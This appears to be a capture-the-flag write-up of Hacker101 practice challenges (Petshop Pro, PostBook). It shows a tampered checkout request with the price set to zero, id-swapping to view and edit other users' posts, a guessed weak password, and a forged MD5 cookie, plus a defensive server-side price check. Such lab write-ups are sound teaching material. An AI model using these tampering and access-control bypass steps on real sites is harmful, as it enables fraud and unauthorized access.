[F2C] hacker101 writeup (in progress)

[Hacker101](https://ctf.hacker101.com/ctf) practice site

Some references:

https://www.anquanke.com/post/id/180186#h2-1

https://github.com/testerting/hacker101-ctf

https://zhuanlan.zhihu.com/p/61338756

Petshop Pro

flag0

  • Something looks out of place with checkout
  • It’s always nice to get free stuff

I picked an animal, added it to the cart, and went to check out.

The checkout request:

POST /43a063d40c/checkout HTTP/1.1
Host: 34.74.105.127
Content-Length: 188
Cache-Control: max-age=0
Origin: http://34.74.105.127
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://34.74.105.127/43a063d40c/cart
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=eyJjYXJ0IjpbMF0sIm1vZGlmaWVkIjp0cnVlfQ.XTKvXQ.sWSc3unmCOQG1axQ55vqwvP9P3o
Connection: close

cart=%5B%5B0%2C+%7B%22logo%22%3A+%22kitten.jpg%22%2C+%22price%22%3A+8.95%2C+%22name%22%3A+%22Kitten%22%2C+%22desc%22%3A+%228%5C%22x10%5C%22+color+glossy+photograph+of+a+kitten.%22%7D%5D%5D

After URL-decoding, the cart parameter becomes:

[[0, {"logo": "kitten.jpg", "price": 8.95, "name": "Kitten", "desc": "8\"x10\" color glossy photograph of a kitten."}]]

The hint says it should be free, so change the price to 0 and submit again. flag get#
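A server-side counterpart to the flag0 issue, as an added example that is not part of the original post or the challenge's code: the handler recomputes the total from its own catalog and treats the client-sent price only as a tamper signal. The `CATALOG` contents and the `price_cart` function are assumptions made for illustration.

```python
import json
from decimal import Decimal
from urllib.parse import parse_qs, urlencode

# Constructed server-side catalog: the only trusted source of prices.
# Item id 0 and its price mirror the Kitten entry in the request above.
CATALOG = {0: {"name": "Kitten", "price": Decimal("8.95")}}


def price_cart(form_body):
    """Price a checkout form body using CATALOG only.

    Returns (total, tampered_ids). Client-sent prices never affect the
    total; ids whose sent price differs are reported for logging/alerting.
    Raises ValueError for a malformed cart or an unknown item id.
    """
    fields = parse_qs(form_body, strict_parsing=True)
    try:
        cart = json.loads(fields["cart"][0])
    except (KeyError, json.JSONDecodeError) as exc:
        raise ValueError("missing or malformed cart field") from exc
    if not isinstance(cart, list):
        raise ValueError("cart must be a JSON list")

    total, tampered = Decimal("0"), []
    for entry in cart:
        if not (isinstance(entry, list) and len(entry) == 2):
            raise ValueError("cart entry must be [id, item]")
        item_id, client_item = entry
        if type(item_id) is not int or item_id not in CATALOG:
            raise ValueError(f"unknown item id: {item_id!r}")
        trusted = CATALOG[item_id]["price"]
        total += trusted  # the price comes from the catalog, not the request
        sent = client_item.get("price") if isinstance(client_item, dict) else None
        if type(sent) not in (int, float) or Decimal(str(sent)) != trusted:
            tampered.append(item_id)
    return total, tampered


if __name__ == "__main__":
    # Constructed bodies in the same cart=<JSON> shape as the request above.
    for price in (8.95, 0):
        body = urlencode({"cart": json.dumps([[0, {"name": "Kitten", "price": price}]])})
        print(price, "->", price_cart(body))
```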

flag1

  • There must be a way to administer the app
  • Tools may help you find the entrypoint

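Before I had even seen the second hint, I tried appending login to the URL, and it really exists [doge]

I tried injection first, which didn't really work. Brute force it is, then……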

PostBook

flag0

  • The person with username “user” has a very easy password…

user/password

flag get#

flag1

  • Try viewing your own post and then see if you can change the ID

The first post, helloworld, is at

http://35.227.24.107/684e8372d4/index.php?page=view.php&id=1

The second post, hello everyone, is at

http://35.227.24.107/684e8372d4/index.php?page=view.php&id=3

Look at the post with id 2. flag get#

flag2

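When creating a new post, I noticed a user_id among the parameters and changed it

(I couldn't find the flag at first; it turned out to be hidden in the response headers.) flag get#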

flag3

  • 189 * 5

This challenge is a bit repetitive: visit the page whose id is 189*5.

flag4

  • You can edit your own posts, what about someone else’s?

The first post, helloworld, was written by the admin user and has no edit button, so go in directly through the edit URL

http://35.227.24.107/684e8372d4/index.php?page=edit.php&id=1

Save it. flag get#

flag5

The cookie is just the MD5 of the id; change it and visit the home page.
